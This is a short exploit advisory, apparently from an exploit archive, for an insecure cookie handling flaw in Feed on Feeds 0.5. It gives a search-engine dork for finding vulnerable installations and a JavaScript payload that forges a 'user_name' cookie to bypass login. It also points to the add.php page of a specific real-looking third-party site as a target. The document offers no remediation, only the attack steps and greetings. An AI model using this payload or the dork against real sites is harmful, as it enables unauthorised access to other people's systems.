============================================================================================================================
| # Title : FEED ON FEEDS 0.5 insecure cookie handling Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 Français V.(Pro) |
| # Version : 0.5 |
| # Vendor : https://github.com/minutils/feed-on-feeds |
| # Dork : Feed on Feeds - Log on |
============================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
[+] use payload : javascript:document.cookie="user_name=user_password_hash;path=/";
go to : http://www.ijqf.org/feed/add.php
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================